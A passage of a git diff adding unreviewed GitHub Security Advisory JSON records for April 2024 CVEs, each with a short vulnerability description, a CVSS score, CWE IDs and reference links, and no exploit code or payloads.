[ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47541" + }, + { + "type": "WEB", + "url": "https://fortiguard.com/psirt/FG-IR-23-416" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cfrx-fq8m-28pv/GHSA-cfrx-fq8m-28pv.json b/advisories/unreviewed/2024/04/GHSA-cfrx-fq8m-28pv/GHSA-cfrx-fq8m-28pv.json new file mode 100644 index 00000000000..9c21b9dbef6 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cfrx-fq8m-28pv/GHSA-cfrx-fq8m-28pv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cfrx-fq8m-28pv", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28929" + ], + "details": "Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28929" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28929" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-190" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cfvh-g2xj-xxg8/GHSA-cfvh-g2xj-xxg8.json b/advisories/unreviewed/2024/04/GHSA-cfvh-g2xj-xxg8/GHSA-cfvh-g2xj-xxg8.json new file mode 100644 index 00000000000..339de6dd98b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cfvh-g2xj-xxg8/GHSA-cfvh-g2xj-xxg8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cfvh-g2xj-xxg8", + "modified": "2024-04-09T18:30:24Z", + "published": "2024-04-09T18:30:24Z", + "aliases": [ + "CVE-2024-26172" + ], + "details": "Windows DWM Core Library Information Disclosure Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26172" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26172" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cg4x-ccfp-j6q9/GHSA-cg4x-ccfp-j6q9.json b/advisories/unreviewed/2024/04/GHSA-cg4x-ccfp-j6q9/GHSA-cg4x-ccfp-j6q9.json new file mode 100644 index 00000000000..43fcb454a23 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cg4x-ccfp-j6q9/GHSA-cg4x-ccfp-j6q9.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cg4x-ccfp-j6q9", + "modified": "2024-04-09T18:30:24Z", + "published": "2024-04-09T18:30:24Z", + "aliases": [ + "CVE-2024-20685" + ], + "details": "Azure Private 5G Core Denial of Service Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20685" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20685" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-130" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cg9r-m2qr-hvvj/GHSA-cg9r-m2qr-hvvj.json b/advisories/unreviewed/2024/04/GHSA-cg9r-m2qr-hvvj/GHSA-cg9r-m2qr-hvvj.json new file mode 100644 index 00000000000..8a233a50d01 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cg9r-m2qr-hvvj/GHSA-cg9r-m2qr-hvvj.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cg9r-m2qr-hvvj", + "modified": "2024-04-08T09:31:13Z", + "published": "2024-04-08T09:31:13Z", + "aliases": [ + "CVE-2023-52541" + ], + "details": "Authentication vulnerability in the API for app pre-loading.\nImpact: Successful exploitation of this vulnerability may affect service confidentiality.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52541" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-chvw-vg4m-qwm6/GHSA-chvw-vg4m-qwm6.json b/advisories/unreviewed/2024/04/GHSA-chvw-vg4m-qwm6/GHSA-chvw-vg4m-qwm6.json new file mode 100644 index 00000000000..d29e5799e38 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-chvw-vg4m-qwm6/GHSA-chvw-vg4m-qwm6.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-chvw-vg4m-qwm6", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-29048" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29048" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29048" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cj94-qf5w-fg9c/GHSA-cj94-qf5w-fg9c.json b/advisories/unreviewed/2024/04/GHSA-cj94-qf5w-fg9c/GHSA-cj94-qf5w-fg9c.json new file mode 100644 index 00000000000..095a8da8e24 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cj94-qf5w-fg9c/GHSA-cj94-qf5w-fg9c.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cj94-qf5w-fg9c", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-30727" + ], + "details": "An issue was discovered in ROS Kinetic Kame in Kinetic Kame ROS_VERSION 1 and ROS_ PYTHON_VERSION 3, where the system transmits messages in plaintext, allowing attackers to obtain sensitive information via a man-in-the-middle attack.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30727" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30727" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T04:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cjgj-qv8v-fhgh/GHSA-cjgj-qv8v-fhgh.json b/advisories/unreviewed/2024/04/GHSA-cjgj-qv8v-fhgh/GHSA-cjgj-qv8v-fhgh.json new file mode 100644 index 00000000000..0a8f8796cf0 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cjgj-qv8v-fhgh/GHSA-cjgj-qv8v-fhgh.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cjgj-qv8v-fhgh", + "modified": "2024-04-05T18:30:35Z", + "published": "2024-04-05T18:30:35Z", + "aliases": [ + "CVE-2024-31848" + ], + "details": "A path traversal vulnerability exists in the Java version of CData API Server < 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31848" + }, + { + "type": "WEB", + "url": "https://www.tenable.com/security/research/tra-2024-09" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T18:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cjj3-f3rf-jf7w/GHSA-cjj3-f3rf-jf7w.json b/advisories/unreviewed/2024/04/GHSA-cjj3-f3rf-jf7w/GHSA-cjj3-f3rf-jf7w.json new file mode 100644 index 00000000000..9579da576be --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cjj3-f3rf-jf7w/GHSA-cjj3-f3rf-jf7w.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cjj3-f3rf-jf7w", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-2243" + ], + "details": "A vulnerability was found in csmock where a regular user of the OSH service (anyone with a valid Kerberos ticket) can use the vulnerability to disclose the confidential Snyk authentication token and to run arbitrary commands on OSH workers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2243" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2024-2243" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2267336" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T11:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cjm7-r96j-5xx3/GHSA-cjm7-r96j-5xx3.json b/advisories/unreviewed/2024/04/GHSA-cjm7-r96j-5xx3/GHSA-cjm7-r96j-5xx3.json new file mode 100644 index 00000000000..b9e86843e53 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cjm7-r96j-5xx3/GHSA-cjm7-r96j-5xx3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cjm7-r96j-5xx3", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28915" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28915" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28915" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cm43-2v3p-vgjx/GHSA-cm43-2v3p-vgjx.json b/advisories/unreviewed/2024/04/GHSA-cm43-2v3p-vgjx/GHSA-cm43-2v3p-vgjx.json new file mode 100644 index 00000000000..1d7a13e59b6 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cm43-2v3p-vgjx/GHSA-cm43-2v3p-vgjx.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cm43-2v3p-vgjx", + "modified": "2024-04-09T21:31:56Z", + "published": "2024-04-09T21:31:56Z", + "aliases": [ + "CVE-2023-6999" + ], + "details": "The Pods – Custom Content Types and Fields plugin for WordPress is vulnerable to Remote Code Exxecution via shortcode in all versions up to, and including, 3.0.10 (with the exception of 2.7.31.2, 2.8.23.2, 2.9.19.2). This makes it possible for authenticated attackers, with contributor level access or higher, to execute code on the server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6999" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/pods/trunk/classes/PodsView.php#L750" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3039486%40pods%2Ftrunk&old=3039467%40pods%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d9108d5f-7b8b-478d-ba9d-f895bdb7dbf2?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cmqc-wqwj-vjqx/GHSA-cmqc-wqwj-vjqx.json b/advisories/unreviewed/2024/04/GHSA-cmqc-wqwj-vjqx/GHSA-cmqc-wqwj-vjqx.json new file mode 100644 index 00000000000..84d2a1258d6 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cmqc-wqwj-vjqx/GHSA-cmqc-wqwj-vjqx.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cmqc-wqwj-vjqx", + "modified": "2024-04-10T15:30:38Z", + "published": "2024-04-10T15:30:38Z", + "aliases": [ + "CVE-2024-30711" + ], + "details": "An issue was discovered in the default configurations of ROS2 Dashing Diademata in ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows unauthenticated attackers to gain access using default credentials.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30711" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30711" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T02:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cp28-995c-wj8q/GHSA-cp28-995c-wj8q.json b/advisories/unreviewed/2024/04/GHSA-cp28-995c-wj8q/GHSA-cp28-995c-wj8q.json new file mode 100644 index 00000000000..1c15511f888 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cp28-995c-wj8q/GHSA-cp28-995c-wj8q.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cp28-995c-wj8q", + "modified": "2024-04-07T18:30:29Z", + "published": "2024-04-07T18:30:29Z", + "aliases": [ + "CVE-2024-22155" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in Automattic WooCommerce.This issue affects WooCommerce: from n/a through 8.5.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22155" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/woocommerce/wordpress-woocommerce-plugin-8-5-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cp8r-2jwf-q8jj/GHSA-cp8r-2jwf-q8jj.json b/advisories/unreviewed/2024/04/GHSA-cp8r-2jwf-q8jj/GHSA-cp8r-2jwf-q8jj.json new file mode 100644 index 00000000000..44528117dd2 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cp8r-2jwf-q8jj/GHSA-cp8r-2jwf-q8jj.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cp8r-2jwf-q8jj", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-27476" + ], + "details": "Leantime 3.0.6 is vulnerable to HTML Injection via /dashboard/show#/tickets/newTicket.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27476" + }, + { + "type": "WEB", + "url": "https://drive.proton.me/urls/X9G9MY1FAW#NLS8RkHUihLY" + }, + { + "type": "WEB", + "url": "https://github.com/Leantime/leantime/blob/264a7dbc2c9b18f574821bf27dd568a287ee8498/app/Domain/Tickets/Controllers/ShowTicket.php#L20" + }, + { + "type": "WEB", + "url": "https://github.com/dead1nfluence/Leantime-POC/blob/main/README.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T15:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cpff-vh9v-hmch/GHSA-cpff-vh9v-hmch.json b/advisories/unreviewed/2024/04/GHSA-cpff-vh9v-hmch/GHSA-cpff-vh9v-hmch.json new file mode 100644 index 00000000000..7be6cd32a72 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cpff-vh9v-hmch/GHSA-cpff-vh9v-hmch.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cpff-vh9v-hmch", + "modified": "2024-04-08T15:30:32Z", + "published": "2024-04-08T15:30:32Z", + "aliases": [ + "CVE-2024-31807" + ], + "details": "TOTOLINK EX200 V4.0.3c.7646_B20201211 was discovered to contain a remote code execution (RCE) vulnerability via the hostTime parameter in the NTPSyncWithHost function.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31807" + }, + { + "type": "WEB", + "url": "https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/EX200/CI_2_NTPSyncWithHost/CI.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cpj9-hvqw-3m28/GHSA-cpj9-hvqw-3m28.json b/advisories/unreviewed/2024/04/GHSA-cpj9-hvqw-3m28/GHSA-cpj9-hvqw-3m28.json new file mode 100644 index 00000000000..1f3e2e892b3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cpj9-hvqw-3m28/GHSA-cpj9-hvqw-3m28.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cpj9-hvqw-3m28", + "modified": "2024-04-10T15:30:38Z", + "published": "2024-04-10T15:30:38Z", + "aliases": [ + "CVE-2024-3534" + ], + "details": "A vulnerability, which was classified as critical, has been found in Campcodes Church Management System 1.0. Affected by this issue is some unknown functionality of the file login.php. The manipulation of the argument password leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259904.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3534" + }, + { + "type": "WEB", + "url": "https://github.com/E1CHO/cve_hub/blob/main/Church%20Management%20System/Church%20Management%20System%20-%20vuln%201.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259904" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259904" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312535" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T03:15:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cpv9-x52v-j5m3/GHSA-cpv9-x52v-j5m3.json b/advisories/unreviewed/2024/04/GHSA-cpv9-x52v-j5m3/GHSA-cpv9-x52v-j5m3.json new file mode 100644 index 00000000000..dc378f712a8 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cpv9-x52v-j5m3/GHSA-cpv9-x52v-j5m3.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cpv9-x52v-j5m3", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2974" + ], + "details": "The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 5.9.13 via the load_more function. This can allow unauthenticated attackers to extract sensitive data including private and draft posts.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2974" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3060417/essential-addons-for-elementor-lite/tags/5.9.14/includes/Traits/Ajax_Handler.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/78f96d7f-aeca-4959-9573-0fb6402de007?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cq2v-6q97-jv69/GHSA-cq2v-6q97-jv69.json b/advisories/unreviewed/2024/04/GHSA-cq2v-6q97-jv69/GHSA-cq2v-6q97-jv69.json new file mode 100644 index 00000000000..09c95aa0352 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cq2v-6q97-jv69/GHSA-cq2v-6q97-jv69.json @@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cq2v-6q97-jv69", + "modified": "2024-04-10T15:30:32Z", + "published": "2024-04-08T12:30:32Z", + "aliases": [ + "CVE-2024-26811" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: validate payload size in ipc response\n\nIf installing malicious ksmbd-tools, ksmbd.mountd can return invalid ipc\nresponse to ksmbd kernel server. ksmbd should validate payload size of\nipc response from ksmbd.mountd to avoid memory overrun or\nslab-out-of-bounds. This patch validate 3 ipc response that has payload.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26811" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/51a6c2af9d20203ddeeaf73314ba8854b38d01bd" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/76af689a45aa44714b46d1a7de4ffdf851ded896" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a637fabac554270a851033f5ab402ecb90bc479c" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a677ebd8ca2f2632ccdecbad7b87641274e15aac" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-crxg-6xqc-vwm7/GHSA-crxg-6xqc-vwm7.json b/advisories/unreviewed/2024/04/GHSA-crxg-6xqc-vwm7/GHSA-crxg-6xqc-vwm7.json new file mode 100644 index 00000000000..2e23926bbe7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-crxg-6xqc-vwm7/GHSA-crxg-6xqc-vwm7.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-crxg-6xqc-vwm7", + "modified": "2024-04-10T15:30:38Z", + "published": "2024-04-10T15:30:38Z", + "aliases": [ + "CVE-2024-30722" + ], + "details": "An issue was discovered in ROS Kinetic Kame in ROS_VERSION 1 and ROS_PYTHON_VERSION 3, allows remote attackers to cause a denial of service (DoS) via the ROS nodes.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30722" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30722" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T03:15:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cv85-hcw5-w2q9/GHSA-cv85-hcw5-w2q9.json b/advisories/unreviewed/2024/04/GHSA-cv85-hcw5-w2q9/GHSA-cv85-hcw5-w2q9.json new file mode 100644 index 00000000000..01bc09c36c2 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cv85-hcw5-w2q9/GHSA-cv85-hcw5-w2q9.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cv85-hcw5-w2q9", + "modified": "2024-04-09T21:31:56Z", + "published": "2024-04-09T21:31:56Z", + "aliases": [ + "CVE-2024-0662" + ], + "details": "The FancyBox for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions 3.0.2 to 3.3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0662" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3058912%40fancybox-for-wordpress&new=3058912%40fancybox-for-wordpress&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/55f8d7e6-7bcd-4556-932b-7bf422db0b39?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cvxw-g73w-j934/GHSA-cvxw-g73w-j934.json b/advisories/unreviewed/2024/04/GHSA-cvxw-g73w-j934/GHSA-cvxw-g73w-j934.json new file mode 100644 index 00000000000..b1b00e4bd6a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cvxw-g73w-j934/GHSA-cvxw-g73w-j934.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cvxw-g73w-j934", + "modified": "2024-04-09T15:30:37Z", + "published": "2024-04-09T15:30:37Z", + "aliases": [ + "CVE-2023-49134" + ], + "details": "A command execution vulnerability exists in the tddpd enable_test_mode functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926 and Tp-Link N300 Wireless Access Point (EAP115 V4) v5.0.4 Build 20220216. A specially crafted series of network requests can lead to arbitrary command execution. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability.This vulnerability impacts `uclited` on the EAP115(V4) 5.0.4 Build 20220216 of the N300 Wireless Gigabit Access Point.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49134" + }, + { + "type": "WEB", + "url": 